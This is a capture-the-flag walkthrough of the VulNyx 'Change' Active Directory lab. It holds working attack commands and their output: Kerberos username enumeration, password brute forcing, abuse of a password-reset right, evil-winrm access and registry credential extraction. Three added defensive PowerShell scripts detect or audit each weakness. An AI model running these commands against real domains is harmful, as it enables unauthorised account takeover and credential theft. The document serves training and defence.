VulNyx Change Walkthrough

Lab: VulNyx
URL: https://vulnyx.com/file/Change.php
OS: Windows
Topic: basic AD operations

The port scan results are as follows.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-15 00:41:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-15T00:42:09
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 15h59m56s
| nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:45:42:91 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   CHANGE<00>           Flags: <unique><active>
|   MEGACHANGE<00>       Flags: <group><active>
|   MEGACHANGE<1c>       Flags: <group><active>
|   CHANGE<20>           Flags: <unique><active>
|_  MEGACHANGE<1b>       Flags: <unique><active>

Take a look at the basic AD information, and add CHANGE.megachange.nyx and megachange.nyx to the hosts file.

~/D/c $ldapsearch -x -H ldap://$IP -s base
rootDomainNamingContext: DC=megachange,DC=nyx
ldapServiceName: megachange.nyx:change$@MEGACHANGE.NYX
...
dsServiceName: CN=NTDS Settings,CN=CHANGE,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=megachange,DC=nyx
dnsHostName: CHANGE.megachange.nyx
defaultNamingContext: DC=megachange,DC=nyx
...

With no other information available, and SMB null-session enumeration turning up nothing, let's see whether some usernames can be enumerated.

~/D/c $kerbrute_linux_amd64 userenum -d megachange.nyx --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/15/25 - Ronnie Flathers @ropnop

2025/03/15 03:40:34 >  Using KDC(s):
2025/03/15 03:40:34 >   192.168.56.10:88

2025/03/15 03:40:41 >  [+] VALID USERNAME:       alfredo@megachange.nyx
2025/03/15 03:40:43 >  [+] VALID USERNAME:       administrator@megachange.nyx
2025/03/15 03:40:47 >  [+] VALID USERNAME:       change@megachange.nyx
2025/03/15 03:41:44 >  [+] VALID USERNAME:       Administrator@megachange.nyx
2025/03/15 03:41:58 >  [+] VALID USERNAME:       Alfredo@megachange.nyx
2025/03/15 03:41:58 >  [+] VALID USERNAME:       sysadmin@megachange.nyx
2025/03/15 03:43:07 >  [+] VALID USERNAME:       Change@megachange.nyx
...
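The enumeration above leaves a footprint on the DC: each guess at a non-existent account makes the KDC log Event ID 4768 with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The following PowerShell is an added example, not part of the original walkthrough; it pulls those events from a DC's Security log and flags source addresses that probe many distinct unknown names. The threshold and window are assumptions to tune.

```powershell
# Added example (not from the walkthrough): detect Kerberos username enumeration such as
# the kerbrute run above. Each guess at a non-existent account makes the KDC log Event 4768
# with Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN); valid accounts return a different code.
# Run on the DC with "Audit Kerberos Authentication Service" enabled. Threshold and
# window are assumptions chosen for this example.
function Find-KerberosUserEnumeration {
    param(
        [int]$Threshold = 20,                          # distinct unknown names per source
        [timespan]$Window = [timespan]::FromMinutes(10)
    )

    $events = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4768
        StartTime = (Get-Date) - $Window
    }

    $failures = foreach ($evt in $events) {
        # Flatten the <Data Name="...">value</Data> entries into a lookup table
        $field = @{}
        foreach ($d in ([xml]$evt.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
        if ($field['Status'] -ne '0x6') { continue }

        [pscustomobject]@{
            Time   = $evt.TimeCreated
            Source = $field['IpAddress'] -replace '^::ffff:', ''   # strip IPv4-mapped prefix
            User   = $field['TargetUserName']
        }
    }

    # Report each source that probed more distinct non-existent names than the threshold
    $failures | Group-Object Source | ForEach-Object {
        $names = @($_.Group.User | Sort-Object -Unique)
        if ($names.Count -ge $Threshold) {
            [pscustomobject]@{
                Source        = $_.Name
                Attempts      = $_.Count
                DistinctNames = $names.Count
                FirstSeen     = ($_.Group.Time | Measure-Object -Minimum).Minimum
                LastSeen      = ($_.Group.Time | Measure-Object -Maximum).Maximum
                Sample        = ($names | Select-Object -First 5) -join ', '
            }
        }
    }
}

Find-KerberosUserEnumeration | Format-Table -AutoSize
```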

Don't expect to brute-force the administrator's password; only the alfredo account's password is worth an attempt.

~/D/c $crackmapexec smb $IP -u alfredo -p /usr/share/wordlists/rockyou.txt | grep -v STATUS_LOGON_FAILURE
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 
SMB                      192.168.56.10   445    CHANGE           [+] megachange.nyx\alfredo:Password1

Check what alfredo can access: the account authenticates to SMB and LDAP, but not to WinRM.

~/D/c $/opt/check_auth.sh -u alfredo -p Password1  $IP
Running: netexec smb 192.168.56.10 -u alfredo -p Password1
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB                      192.168.56.10   445    CHANGE           [+] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec winrm 192.168.56.10 -u alfredo -p Password1
WINRM                    192.168.56.10   5985   CHANGE           [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM                    192.168.56.10   5985   CHANGE           [-] megachange.nyx\alfredo:Password1
----------------------------------------
Running: netexec ldap 192.168.56.10 -u alfredo -p Password1
SMB                      192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP                     192.168.56.10   389    CHANGE           [+] megachange.nyx\alfredo:Password1
----------------------------------------

List the domain users; they are the same ones enumerated a moment ago.

~/D/c $rpcclient -U  "alfredo%Password1" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[alfredo] rid:[0x44f]
user:[sysadmin] rid:[0x450]

Collect BloodHound data.

~/D/c $netexec ldap $IP -u alfredo -p Password1  --bloodhound --collection All --dns-server $IP
SMB         192.168.56.10   445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    CHANGE           [+] megachange.nyx\alfredo:Password1
LDAP        192.168.56.10   389    CHANGE           Resolved collection methods: objectprops, psremote, localadmin, container, rdp, dcom, group, acl, trusts, session
LDAP        192.168.56.10   389    CHANGE           Done in 00M 01S
LDAP        192.168.56.10   389    CHANGE           Compressing output into /home/kali/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip

BloodHound shows that alfredo can change the sysadmin user's password.

Change sysadmin's password.

~/D/c $mv ~/.nxc/logs/CHANGE_192.168.56.10_2025-03-15_044954_bloodhound.zip ./

~/D/c $net rpc password "sysadmin" "Password2" -U megachange.nyx/alfredo%Password1 -S change.megachange.nyx

~/D/c $netexec winrm $IP -u sysadmin -p Password2
WINRM       192.168.56.10   5985   CHANGE           [*] Windows 10 / Server 2019 Build 17763 (name:CHANGE) (domain:megachange.nyx)
WINRM       192.168.56.10   5985   CHANGE           [+] megachange.nyx\sysadmin:Password2 (Pwn3d!)
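The `net rpc password` call above works because alfredo holds a password-reset right over sysadmin. As an added example, not part of the original walkthrough, the following PowerShell audits a domain for exactly that kind of grant: non-admin principals that hold the User-Force-Change-Password extended right (or GenericAll) over user objects. It assumes the RSAT ActiveDirectory module is available, and the list of expected trustees is an assumption to align with your own admin groups.

```powershell
# Added example (not from the walkthrough): find non-admin principals that can reset
# other users' passwords, the right alfredo held over sysadmin and exercised above
# with "net rpc password". Needs the RSAT ActiveDirectory module (AD: drive).
# The list of expected trustees is an assumption; align it with your own admin groups.
Import-Module ActiveDirectory

# Schema rightsGuid of the "User-Force-Change-Password" extended right
$ForceChangePassword = [guid]'00299570-246d-11d0-a768-00aa006e0529'
# An ExtendedRight ACE with an empty ObjectType grants every extended right
$AllExtendedRights   = [guid]::Empty

$ExpectedTrustees = @(
    'NT AUTHORITY\SYSTEM'
    'BUILTIN\Administrators'
    'BUILTIN\Account Operators'
    "$env:USERDOMAIN\Domain Admins"
    "$env:USERDOMAIN\Enterprise Admins"
)

function Get-PasswordResetGrant {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    $extended   = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $genericAll = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

    foreach ($user in Get-ADUser -Filter * -SearchBase $SearchBase) {
        $acl = Get-Acl -Path ("AD:\" + $user.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ExpectedTrustees -contains $ace.IdentityReference.Value) { continue }

            $hasGenericAll = ($ace.ActiveDirectoryRights -band $genericAll) -eq $genericAll
            $hasReset      = (($ace.ActiveDirectoryRights -band $extended) -ne 0) -and
                             ($ace.ObjectType -in @($ForceChangePassword, $AllExtendedRights))
            if (-not ($hasGenericAll -or $hasReset)) { continue }

            # In the lab this yields Target=sysadmin, Trustee=MEGACHANGE\alfredo
            [pscustomobject]@{
                Target    = $user.SamAccountName
                Trustee   = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

Get-PasswordResetGrant | Format-Table -AutoSize
```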

Log in with evil-winrm, upload winPEAS, and search for sensitive information.

~/D/c $evil-winrm -i $IP -u sysadmin -p Password2
...
*Evil-WinRM* PS C:\Users\sysadmin\Documents> upload winPEASx64.exe

Info: Uploading /home/kali/Documents/change/winPEASx64.exe to C:\Users\sysadmin\Documents\winPEASx64.exe

Data: 13122900 bytes of 13122900 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\sysadmin\Documents> .\winPEASx64.exe > out.log

The administrator's password turns up in the output.

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  MEGACHANGE
    DefaultUserName               :  administrator
    DefaultPassword               :  d0m@in_c0ntr0ll3r

This information is in fact stored in the registry.

*Evil-WinRM* PS C:\Users\sysadmin\Documents> Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

AutoRestartShell             : 1
Background                   : 0 0 0
CachedLogonsCount            : 10
DebugServerCommand           : no
DefaultDomainName            : MEGACHANGE
DefaultUserName              : administrator
DisableBackButton            : 1
EnableSIHostIntegration      : 1
ForceUnlockLogon             : 0
LegalNoticeCaption           :
LegalNoticeText              :
PasswordExpiryWarning        : 5
PowerdownAfterShutdown       : 0
PreCreateKnownFolders        : {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk                 : 1
Shell                        : explorer.exe
ShellCritical                : 0
ShellInfrastructure          : sihost.exe
SiHostCritical               : 0
SiHostReadyTimeOut           : 0
SiHostRestartCountLimit      : 0
SiHostRestartTimeGap         : 0
Userinit                     : C:\Windows\system32\userinit.exe,
VMApplet                     : SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled          : 0
ShellAppRuntime              : ShellAppRuntime.exe
scremoveoption               : 0
DisableCAD                   : 1
LastLogOffEndTimePerfCounter : 12624879505
ShutdownFlags                : 2147483687
DisableLockWorkstation       : 0
DefaultPassword              : d0m@in_c0ntr0ll3r
AutoAdminLogon               : 0
AutoLogonSID                 : S-1-5-21-604841344-1972660676-6905362-500
LastUsedUsername             : administrator
PSPath                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PSParentPath                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName                  : Winlogon
PSDrive                      : HKLM
PSProvider                   : Microsoft.PowerShell.Core\Registry
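The Winlogon dump above shows the pattern worth auditing for: a DefaultPassword left behind even though AutoAdminLogon is 0. The following PowerShell is an added example, not part of the original walkthrough; it checks that key, reports a stored plaintext password, and can remove the value. The `-Remediate` switch is this script's own, not a Windows setting.

```powershell
# Added example (not from the walkthrough): audit the Winlogon key that winPEAS read
# above. Reports a stored DefaultPassword even when AutoAdminLogon is 0, which is
# exactly the state found on CHANGE. Run elevated; -Remediate is this script's own
# switch and deletes the plaintext value after confirmation.
function Test-AutoLogonCredential {
    [CmdletBinding(SupportsShouldProcess)]
    param([switch]$Remediate)

    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $key

    $finding = [pscustomobject]@{
        AutoAdminLogon     = [int]($props.AutoAdminLogon)          # stored as REG_SZ "0"/"1"
        DefaultDomainName  = $props.DefaultDomainName
        DefaultUserName    = $props.DefaultUserName
        HasDefaultPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)
        # RID 500 in AutoLogonSID means the built-in Administrator is the configured account
        IsBuiltinAdmin     = ("$($props.AutoLogonSID)" -like '*-500')
    }

    if ($finding.HasDefaultPassword) {
        $who = "$($finding.DefaultDomainName)\$($finding.DefaultUserName)"
        Write-Warning "Plaintext AutoLogon password stored in Winlogon for $who"
        if ($finding.IsBuiltinAdmin) {
            Write-Warning 'Configured account is the built-in Administrator (RID 500)'
        }
        if ($Remediate -and $PSCmdlet.ShouldProcess($key, 'Remove DefaultPassword')) {
            Remove-ItemProperty -Path $key -Name DefaultPassword
            # Removing the value does not undo exposure: rotate the account's password,
            # since anyone who could read HKLM may already have it (as the sysadmin
            # session above did).
        }
    }

    # Caveat: the Sysinternals Autologon tool stores the password as the LSA secret
    # "DefaultPassword" instead of this registry value; that case is not covered here.
    return $finding
}

Test-AutoLogonCredential
```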
